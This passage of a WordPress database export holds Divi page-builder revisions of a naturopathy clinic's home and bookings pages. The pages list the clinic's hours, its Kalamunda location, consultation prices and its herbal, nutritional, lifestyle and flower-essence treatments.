admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verde-health.au2.cliniko.com/bookings?business_id=430041870630918322&practitioner_id=430041868173056552\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]\n<!-- /wp:divi/placeholder -->','Bookings','','inherit','closed','closed','','48-revision-v1','','','2021-05-27 21:27:34','2021-05-27 13:27:34','',48,'https://verdenaturopathy.com.au/?p=256',0,'revision','',0),(261,1,'2021-05-27 21:30:43','2021-05-27 13:30:43','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; \">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; \">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; ;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px;font-family: Montserrat; \">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; \">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; \">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online telehealth consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up consult (50 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies or emotional health issues. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9am-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-27 21:30:43','2021-05-27 13:30:43','',28,'https://verdenaturopathy.com.au/?p=261',0,'revision','',0),(263,1,'2021-05-27 21:31:27','2021-05-27 13:31:27','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; \">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; \">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; ;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px;font-family: Montserrat; \">doctor as teacher</span></li>\n<li><span 